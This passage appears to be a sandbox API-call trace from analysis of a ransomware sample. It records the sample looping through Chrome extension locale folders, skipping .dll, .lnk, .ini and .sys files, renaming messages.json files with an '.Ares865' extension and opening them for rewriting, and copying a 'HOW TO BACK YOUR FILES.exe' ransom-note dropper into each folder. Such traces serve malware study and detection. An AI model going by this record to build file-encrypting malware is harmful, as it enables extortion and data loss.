ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.947] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.947] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.947] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.947] lstrlenW (lpString="messages.json") returned 13 [0100.947] lstrlenW (lpString="Ares865") returned 7 [0100.947] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.947] lstrlenW (lpString=".dll") returned 4 [0100.947] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.947] lstrlenW (lpString=".lnk") returned 4 [0100.947] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.947] lstrlenW (lpString=".ini") returned 4 [0100.947] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.947] lstrlenW (lpString=".sys") returned 4 [0100.947] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.947] lstrlenW (lpString="messages.json") returned 13 [0100.947] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.Ares865") returned 160 [0100.948] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.949] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=256) returned 1 [0100.953] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja" [0100.953] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja" [0100.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.954] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.954] GetLastError () returned 0x0 [0100.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.954] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.954] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.954] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.954] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.954] lstrlenW (lpString="messages.json") returned 13 [0100.955] lstrlenW (lpString="Ares865") returned 7 [0100.955] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.955] lstrlenW (lpString=".dll") returned 4 [0100.955] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.955] lstrlenW (lpString=".lnk") returned 4 [0100.955] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.955] lstrlenW (lpString=".ini") returned 4 [0100.955] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.955] lstrlenW (lpString=".sys") returned 4 [0100.955] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.955] lstrlenW (lpString="messages.json") returned 13 [0100.955] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.Ares865") returned 160 [0100.955] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.961] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=271) returned 1 [0100.966] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it" [0100.966] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it" [0100.966] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.966] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.967] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.967] GetLastError () returned 0x0 [0100.967] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.968] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.968] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.968] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.968] lstrlenW (lpString="messages.json") returned 13 [0100.968] lstrlenW (lpString="Ares865") returned 7 [0100.968] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.968] lstrlenW (lpString=".dll") returned 4 [0100.968] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.968] lstrlenW (lpString=".lnk") returned 4 [0100.968] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.968] lstrlenW (lpString=".ini") returned 4 [0100.968] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.968] lstrlenW (lpString=".sys") returned 4 [0100.968] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.968] lstrlenW (lpString="messages.json") returned 13 [0100.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.Ares865") returned 160 [0100.968] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=256) returned 1 [0100.973] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id" [0100.973] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id" [0100.973] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.973] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.974] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.974] GetLastError () returned 0x0 [0100.974] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.974] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.974] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.974] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.975] lstrlenW (lpString="messages.json") returned 13 [0100.975] lstrlenW (lpString="Ares865") returned 7 [0100.975] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.975] lstrlenW (lpString=".dll") returned 4 [0100.975] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.975] lstrlenW (lpString=".lnk") returned 4 [0100.975] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.975] lstrlenW (lpString=".ini") returned 4 [0100.975] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.975] lstrlenW (lpString=".sys") returned 4 [0100.975] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.975] lstrlenW (lpString="messages.json") returned 13 [0100.975] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.Ares865") returned 160 [0100.975] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.976] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=242) returned 1 [0100.980] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu" [0100.980] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu" [0100.980] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.980] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.981] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.981] GetLastError () returned 0x0 [0100.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e384940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e384940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.981] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.981] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.981] lstrlenW (lpString="messages.json") returned 13 [0100.981] lstrlenW (lpString="Ares865") returned 7 [0100.981] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.981] lstrlenW (lpString=".dll") returned 4 [0100.981] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.982] lstrlenW (lpString=".lnk") returned 4 [0100.982] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.982] lstrlenW (lpString=".ini") returned 4 [0100.982] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.982] lstrlenW (lpString=".sys") returned 4 [0100.982] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.982] lstrlenW (lpString="messages.json") returned 13 [0100.982] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.Ares865") returned 160 [0100.982] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, 